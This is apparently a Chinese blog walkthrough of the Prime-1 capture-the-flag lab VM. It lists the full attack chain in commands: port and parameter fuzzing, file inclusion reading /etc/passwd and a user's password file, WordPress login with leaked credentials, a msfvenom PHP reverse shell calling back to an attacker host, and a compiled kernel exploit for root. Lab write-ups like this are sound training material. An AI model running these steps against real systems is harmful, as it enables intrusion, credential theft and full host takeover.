码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 靶场prime-1练习


    以下是靶场地址

    下载安装该虚拟机,以下是虚拟机打开界面

    1、探测开放端口

    nmap -p 1-65535 -A 192.168.133.139

    2、端口进行扫描,发现存在22端口和80端口访问80端口,如图所示:

    注:

    (1)查看网页源码

    (2)目录扫描

    (3)F12 3.利用kali自带目录扫描工具进行扫描

    (1)dirb http://192.168.133.139/

    (2)dirb http://192.168.133.139  -X .txt,.zip,.php

     (3)wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.133.139/ind ex.php?FUZZ

    成功获得参数file,但结果却不尽人意,挖错文件名了

     

    不过不灰心,之前我们忽略了一个参数,我们可以搞一波

    curl    http://192.168.133.139/index.php?file=location.txt

    注:如何将kali文件下载到物理机

    sz file   /usr/share/wfuzz/wordlist/general/common.txt   (字典路径) 4.找到正确的参数以后进行执行

    curl  http://192.168.133.139/image.php?secrettier360=aaahttp://192.168.133.139/image.php?secrettier360=aaa

    注:提示我们终于获得正确的参数

    3、利用参数请求查看passwd文件,成功获取敏感信息http://192.168.133.139/image.php?secrettier360=/etc/passwd

     就在此时一个新大陆出现了

     

    curl     http://192.168.133.139/index.php?secrettier360=/home/saket/password.txt 

     

    curl    http://192.168.133.139/image.php?secrettier360=/home/saket/password.txt 

     

    4、在之前我们通过目录扫描发现存在wordpress的目录,进行访问,存在登录界面,通过观察页面得到用 户名 

     

    5、利用kali自带工具cmseek进行指纹信息收集,有点尴尬,这个工具没有,我进行了下载 

     

    注:也可以利用wpscan   进行漏洞信息收集

    wpscan --url http://192.168.133.139/wordpress/ --enumerate u

    6、 利用找出的用户名和密码进行登录     用户名:victor 密码:follow_the_ippsec,成功登录后台

    登录后台以后首先想找上传点,比如上传图片、上传文件等等 

    7、利用msf生成反弹链接

    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.129   lport=7777 -o shell.php

     

    点击保存,保存成功。

    8、利用msfconsole进行监听反弹shell,通过访问写入反弹shell的php文件触发,成功弹回shell

    1. use exploit/mulit/handler
    2. set payload php/meterpreter/reverse_tcp set lhost 192.168.133.129
    3. set lport 7777
    4. exploit

     得出Linux内核版本

    9、 通过msfconsole 查找相关漏洞

    searchsploit 16.04 Ubuntu

    msfconsole的数据存储 cd /usr/share/exploitdb/exploits/linux

     cp 45010.c /root

    重新进行编译

    gcc 45010.c

    gcc 45010.c -o 45010

    在之前获取到meterpreter那里进行上传

    upload  /root/45010 /tmp/45010

     进行提权

    shell #进行shell执行

    cd /tmp #进入tmp文件中chmod +x 45010 #权限提升

    ./45010 #执行

    whoami   #查看当前权限450

    10、成功拿到root权限以后,在root权限下会存放一些重要的文件

     

     成功获取flag值

  • 相关阅读:
    SpringMVCJSR303和拦截器
    SpringFramework:Spring IOC
    十天学完基础数据结构-第七天(图(Graph))
    2022年数维杯国际赛C题 如何利用大脑结构诊断阿尔茨海默氏病
    数据一致性问题(分布式)
    【性能测试】分布式压测之locust和Jmeter的使用
    cpp占位参数在重载运算符中的作用
    应用LLL算法解决背包问题
    [附源码]java毕业设计基于JAVAWEB医院挂号系统
    设计师首选:最佳的5款网页设计软件
  • 原文地址:https://blog.csdn.net/qq_49091880/article/details/127424270
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号